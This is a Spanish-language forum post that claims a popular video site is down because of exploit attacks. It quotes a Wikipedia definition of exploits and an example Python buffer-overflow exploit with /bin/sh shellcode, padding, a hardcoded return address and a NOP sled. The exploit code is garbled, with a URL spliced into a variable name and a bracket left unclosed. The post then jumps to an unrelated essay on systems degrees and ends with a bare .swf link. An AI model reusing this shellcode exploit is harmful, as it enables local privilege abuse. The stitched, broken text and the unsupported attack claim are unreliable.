arielelkapo
Usuario (Argentina)

hola vengo a informarles que el sitio mas famoso para colgar videos online esta siendo atacado por exploits : Que son los exploits? Exploit (del inglés to exploit, explotar o aprovechar) es una pieza de software, un fragmento de datos, o una secuencia de comandos con el fin de automatizar el aprovechamiento de un error, fallo o vulnerabilidad, a fin de causar un comportamiento no deseado o imprevisto en los programas informáticos, hardware, o componente electrónico (por lo general computarizado). Con frecuencia, esto incluye cosas tales como la violenta toma de control de un sistema de cómputo o permitir la escalada de privilegios o un ataque de denegación de servicio. El fin del Exploit puede ser violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros. Los Exploits pueden ser escritos empleando una diversidad de lenguajes de programación, aunque mayoritariamente se suele utilizar lenguaje C. como así también aprovecharse de distintos tipos de ataques tales como Desbordamiento de búfer, Cross Site Scripting, Format Strings, Inyección SQL, entre otros. Un ejemplo de un exploit, que se aprovecha de un Desbordamiento de búfer escrito en lenguaje Python sería: dijo:#!/usr/bin/env python import os import sys import time class Exploit: def __init__(self): if len(sys.argv) <> 2: print "\n[*] Usage: python exploit.py /path/binary\n" exit() else: self.arg2=sys.argv[1] # Command=/bin/sh Size=24 bytes Bind=No self.shellcode = ("\x99\x31\xc0\x52\x68\x6e\x2f\x73" "\x68\x68\x2f\x2f\x62\x69\x89\xe3" "\x52\x53\x89\xe1\xb0\x0b\xcd\x80" self.payload = '\x41'*1036 # Padding 0x41 (A) self.payloahttp://es.wikipedia.org/wiki/Exploitd += '\x70\x9b\x80\xbf' # Magic Address -> 0xbf809b70 self.payload += '\x90'*10000 # 0x90 (NOP) x 10000 # The ASLR begin at the memory address 0xbf80010#i1 def loop(self): print "\n[+] Starting Explotation...\n" time.sleep(2) while True: os.system(self.arg2 + ' ' + self.payload + self.shellcode) """Start execution""" if __name__ == '__main__': union=Exploit() conector=union.loop() exit() Una de las herramientas más utilizadas para trabajar con este tipo de software es Metasploit Framework, una plataforma de test de penetración escrita en lenguaje de programación Ruby, como así también otros frameworks como Core Impact, Canvas, entre otros. esta funcionando como el toor.... al momento de querer acceder con una cuenta o ver algun video devuelve el siguiente error: Http/1.1 Service Unavailable momentaneamente estan trabajando sobre el problema...y en cualquier momento vuelve a la normalidad. fuente http://es.wikipedia.org/wiki/Exploit
1°.- Tanto ingenieros como licenciados estan capacitados para programar, solo que en algunas universidades de este pais bananero, los planes de estudio estan tan horrorosamente armados que he tenido amigos que tuvieron que cambiar de facultad por darse cuenta que estaban perdiendo el tiempo. (Pequeña anecdota: un amigo Ing. me confesó que aprendió mas en un TERCIARIO de tecnico en computación que en la facultad UTN, por lo que decidio continuar su carrera en la UBA). Y sin ir mas lejos yo en mi facultad tuve programación, MUY BASICA SI !! Pero dudo mucho que encuentren a Ing. industriales programando. 2°.- La ventaja que poseen los ingenieros sobre los licenciados, es que los primeros poseen un ciclo basico mucho mas exigente. Con lo que deberian estar mejor preparados para afrontar los problemas que se presenten. 3°.- No se deben confundir INFORMATICA o COMPUTACIÓN con SISTEMAS. Estos ultimos se encargan precisamente de eso EL SISTEMA, el conjunto de partes y la relación entre las mismas, ya sea que el sistema sea informatico, mecanico, en papel, etc... Y es aqui donde radica la discusión. TANTO LIC. como ING. en Computación poseen un mejor manejo de las herramientas informaticas MIENTRAS QUE LOS LIC. O ING EN SISTEMAS poseen una orientación MAS AMPLIA Y MENOS PROFUNDA. A que me refiero con esto???. A que un egresado de sistemas debe ver el todo y las partes. Es por eso que debe tener conocimientos muy variados que lo alejan del perfil netamente TECNICO. (materias como administracion, gestion de recursos humanos, contabilidad que quitan horas catedra de programacion de algoritmos neta) y es por esta razon que estan mas abocados a las tareas de tipo de Gestion (comprender a la gerencia de una empresa es la herramienta mas poderosa que tiene una persona a la hora de vender sus capacidades) 4°.- Y por ultimo, en sistemas de corto o mediano alcance los Ing. o Lic. en computacion pueden realizar su trabajo sin mayores sobresaltos, pero en sistema amplios si no cuentan con personas que realicen una buena sintesis de lo que se esta buscando y comprendan como funciona el SISTEMA (me refiero aqui a los Ing. o Lic. en Sistemas), lo mas probable es que se pierda el objetivo de vista terminando en una implementacion pesima o que el analisis se torne tan engorroso por ser poco claro, que nunca funcionara nada. biem, espero sus comentarios. pd: en realidad estoy por ingresar en la universidad a estudiar licenciado en sistemas, pero no tengo bien en claro que salida laboral voy a tener; vi por algunos sitios que dicen que es programar, y programar, y salir a comprar puchos, y programar. pero no se. Perfil del Licenciado en Sistemas de Información de las Organizaciones El egresado puede insertarse en las organizaciones en relación de dependencia, o como profesional independiente. Las actividades en que puede desempeñarse, se encuentran reflejadas en las incumbencias que el Ministerio de Cultura y Educación de la Nación otorga al título de Licenciado en Sistemas de Información de las Organizaciones (Resolución Nº 1878), considerando a dicho profesional apto para: * evaluar las necesidades y problemas de las organizaciones en materia de tratamiento de la información, con la finalidad de diseñar e implantar sus sistemas de información y las funciones de control interno y externo, de acuerdo a las particularidades del negocio o actividad de la que se trate * planificar, dirigir y controlar el relevamiento, diseño y ejecución de los proyectos, así como la implantación de sistemas de información en las organizaciones y entes de racionalidad económica; * dirigir y evaluar los estudios técnico-económicos y de factibilidad en proyectos de sistemas de información, procesamiento y comunicación de datos; * administrar los recursos tecnológicos informáticos para el logro de una adecuada gestión, que satisfaga las demandas de las organizaciones y sus estrategias a corto y largo plazo; * asesorar sobre la interpretación de la legislación correspondiente a la tecnología de la información, planificación, diseño, procesamiento y comunicación de datos, tanto para el ámbito público como el privado; * intervenir en equipos con enfoque interdisciplinario en proyectos de consultoría, auditoria informática, optimización de procesos de IT, etc., que requieran la integración profesional de los especialistas en sistemas con otras áreas del conocimiento. Fuente cedida por CASIO link: http://img22.xooimage.com/files/b/2/a/vvv-130f67a.swf